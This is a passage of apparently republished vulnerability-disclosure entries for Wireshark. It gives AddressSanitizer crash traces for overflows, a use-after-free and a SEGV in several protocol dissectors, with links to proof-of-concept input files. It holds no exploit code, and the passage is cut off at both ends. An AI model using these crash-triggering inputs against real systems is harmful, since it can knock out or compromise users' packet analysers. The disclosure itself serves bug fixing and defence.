=>0x100055b710a0: 00 00 00 00 f3[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710b0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
0x100055b710c0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b710f0: f1 f1 f1 f1 04 f2 04 f3 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3901==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11791. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39004.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=644
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==4567==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc1c406210 at pc 0x0000004c1386 bp 0x7ffc1c406010 sp 0x7ffc1c4057c0
WRITE of size 32 at 0x7ffc1c406210 thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xc27f15 in tvb_memcpy wireshark/epan/tvbuff.c:783:10
#2 0x233feeb in dissect_diameter_base_framed_ipv6_prefix wireshark/epan/dissectors/packet-diameter.c:526:3
#3 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#5 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#6 0x234b527 in call_avp_subdissector wireshark/epan/dissectors/packet-diameter.c:612:4
#7 0x234a804 in dissect_diameter_avp wireshark/epan/dissectors/packet-diameter.c:805:2
#8 0x23514b5 in dissect_diameter_common wireshark/epan/dissectors/packet-diameter.c:1405:13
#9 0x233f82f in dissect_diameter wireshark/epan/dissectors/packet-diameter.c:1495:9
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#14 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#15 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#16 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#17 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#18 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#22 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#23 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#24 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#26 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#28 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#32 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#33 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#34 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#35 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#36 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#37 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#38 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#44 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#45 0x53c91b in process_packet wireshark/tshark.c:3728:5
#46 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#47 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffc1c406210 is located in stack of thread T0 at offset 48 in frame
#0 0x233fb4f in dissect_diameter_base_framed_ipv6_prefix wireshark/epan/dissectors/packet-diameter.c:504
This frame has 2 object(s):
[32, 48) 'value'
[64, 80) 'addr' <== Memory access at offset 48 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100003878bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c00: 00 00 00 00 f1 f1 f1 f1 04 f2 04 f3 00 00 00 00
0x100003878c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c30: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
=>0x100003878c40: 00 00[f2]f2 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100003878c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100003878c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4567==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11792. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39003.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=645
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==5117==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00001e3b2 at pc 0x000000499bad bp 0x7ffd2111f650 sp 0x7ffd2111ee00
READ of size 4 at 0x61b00001e3b2 thread T0
#0 0x499bac in memcmp llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:416
#1 0x37949bc in addresses_equal wireshark/epan/dissectors/./../address.h:140:26
#2 0x379389a in rsvp_equal wireshark/epan/dissectors/packet-rsvp.c:1886:13
#3 0x7f77e4ae95ef in g_hash_table_lookup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x385ef)
#4 0x3796e2d in dissect_rsvp_common wireshark/epan/dissectors/packet-rsvp.c:7531:37
#5 0x37930d4 in dissect_rsvp wireshark/epan/dissectors/packet-rsvp.c:7553:5
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#10 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#14 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#15 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#16 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#17 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#18 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#19 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#20 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#21 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#22 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#24 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#28 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#31 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x53c91b in process_packet wireshark/tshark.c:3728:5
#33 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#34 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e3b2 is located 50 bytes inside of 1500-byte region [0x61b00001e380,0x61b00001e95c)
freed by thread T0 here:
#0 0x4d7380 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0x7f77e4aff6ae in g_realloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e6ae)
#2 0x9d71b7 in wtap_read_packet_bytes wireshark/wiretap/wtap.c:1419:2
#3 0x89ee21 in libpcap_read_packet wireshark/wiretap/libpcap.c:722:7
#4 0x8991f4 in libpcap_read wireshark/wiretap/libpcap.c:619:9
#5 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#6 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#7 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f77e4aff610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-use-after-free llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:416 in memcmp
Shadow bytes around the buggy address:
0x0c367fffbc20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbc60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbc70: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c367fffbc80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbc90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbcb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c367fffbcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5117==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11793. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39002.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=646
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==5629==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000044bf7e6 at pc 0x0000009eb451 bp 0x7ffcd2fd6050 sp 0x7ffcd2fd6048
READ of size 1 at 0x0000044bf7e6 thread T0
#0 0x9eb450 in ascend_seek wireshark/wiretap/ascendtext.c:105:19
#1 0x9ea5e0 in ascend_open wireshark/wiretap/ascendtext.c:167:12
#2 0x83f7c6 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
0x0000044bf7e6 is located 58 bytes to the left of global variable '<string literal>' defined in 'ascendtext.c:61:25' (0x44bf820) of size 10
'<string literal>' is ascii string 'PRI-XMIT-'
0x0000044bf7e6 is located 0 bytes to the right of global variable '<string literal>' defined in 'ascendtext.c:117:30' (0x44bf7e0) of size 6
'<string literal>' is ascii string 'Date:'
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/wiretap/ascendtext.c:105:19 in ascend_seek
Shadow bytes around the buggy address:
0x00008088fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008088feb0: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x00008088fec0: 00 00 00 01 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9
0x00008088fed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008088fee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x00008088fef0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9[06]f9 f9 f9
0x00008088ff00: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 01 f9 f9
0x00008088ff10: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x00008088ff20: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x00008088ff30: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008088ff40: f9 f9 f9 f9 00 00 01 f9 f9 f9 f9 f9 06 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5629==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11794. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39001.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=649
The following crash due to a static buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8089==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000df60580 at pc 0x000000d6eb8c bp 0x7ffc622f4a80 sp 0x7ffc622f4a78
WRITE of size 1 at 0x00000df60580 thread T0
#0 0xd6eb8b in my_dgt_tbcd_unpack wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16
#1 0xd71258 in de_mid wireshark/epan/dissectors/packet-gsm_a_common.c:2270:9
#2 0x3c7ce02 in dissect_uma_IE wireshark/epan/dissectors/packet-uma.c:912:3
#3 0x3c7bfd1 in dissect_uma wireshark/epan/dissectors/packet-uma.c:1664:13
#4 0x1317640 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2740:13
#5 0x3c7b62b in dissect_uma_tcp wireshark/epan/dissectors/packet-uma.c:1699:2
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x1318ea7 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
#10 0x131ea52 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#11 0x1319ad8 in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#12 0x132fb70 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#13 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#15 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#16 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#17 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#22 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#23 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#24 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#25 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#26 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#27 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#28 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#32 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#36 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#37 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#38 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#39 0x53c91b in process_packet wireshark/tshark.c:3728:5
#40 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#41 0x52c1df in main wireshark/tshark.c:2197:13
0x00000df60580 is located 0 bytes to the right of global variable 'a_bigbuf' defined in 'packet-gsm_a_common.c:762:13' (0xdf60180) of size 1024
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16 in my_dgt_tbcd_unpack
Shadow bytes around the buggy address:
0x000081be4060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x000081be40b0:[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40e0: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000081be40f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8089==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11797. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39000.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=652
The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31034==ERROR: AddressSanitizer: SEGV on unknown address 0x7fc24e20fa84 (pc 0x7fbe445bb082 bp 0x7fff030fefb0 sp 0x7fff030fef00 T0)
#0 0x7fbe445bb081 in dissect_nbap_MACdPDU_Size wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79
#1 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#2 0x7fbe445c760d in dissect_nbap_HSDSCH_Initial_Capacity_AllocationItem wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1650:12
#3 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#4 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#5 0x7fbe445c7569 in dissect_nbap_HSDSCH_Initial_Capacity_Allocation wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1663:12
#6 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#7 0x7fbe445da43d in dissect_nbap_CommonMACFlow_Specific_InfoItem_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1682:12
#8 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#9 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#10 0x7fbe445da399 in dissect_nbap_CommonMACFlow_Specific_InfoList_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1695:12
#11 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#12 0x7fbe445da2bd in dissect_nbap_HSDSCH_Common_System_Information_ResponseFDD wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2120:12
#13 0x7fbe44546230 in dissect_HSDSCH_Common_System_Information_ResponseFDD_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2430:12
#14 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#16 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#17 0x7fbe4456f40e in dissect_ProtocolExtensionFieldExtensionValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:320:11
#18 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5
#19 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9
#20 0x7fbe4456f370 in dissect_nbap_T_extensionValue wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:200:12
#21 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#22 0x7fbe4456f12d in dissect_nbap_ProtocolExtensionField wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:215:12
#23 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#24 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#25 0x7fbe4456ef09 in dissect_nbap_ProtocolExtensionContainer wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:228:12
#26 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#27 0x7fbe445f23bf in dissect_nbap_CommonMeasurementInitiationRequest wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:263:12
#28 0x7fbe445644d0 in dissect_CommonMeasurementInitiationRequest_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:5030:12
#29 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#31 0x7fbe41b3802d in dissector_try_string wireshark/epan/packet.c:1443:9
#32 0x7fbe4456e3ce in dissect_InitiatingMessageValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:326:11
#33 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5
#34 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9
#35 0x7fbe4456df10 in dissect_nbap_InitiatingMessage_value wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:702:12
#36 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#37 0x7fbe4456d91d in dissect_nbap_InitiatingMessage wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:719:12
#38 0x7fbe433cc861 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1714:13
#39 0x7fbe4456d881 in dissect_nbap_NBAP_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:825:12
#40 0x7fbe4456d740 in dissect_NBAP_PDU_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:8430:12
#41 0x7fbe444e889b in dissect_nbap wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:457:9
#42 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#43 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#44 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#45 0x7fbe4378f98b in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#46 0x7fbe43786b88 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#47 0x7fbe4377fd99 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#48 0x7fbe4377cd03 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#49 0x7fbe4377acdf in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#50 0x7fbe43778cba in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#51 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#52 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#53 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#54 0x7fbe428455f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#55 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
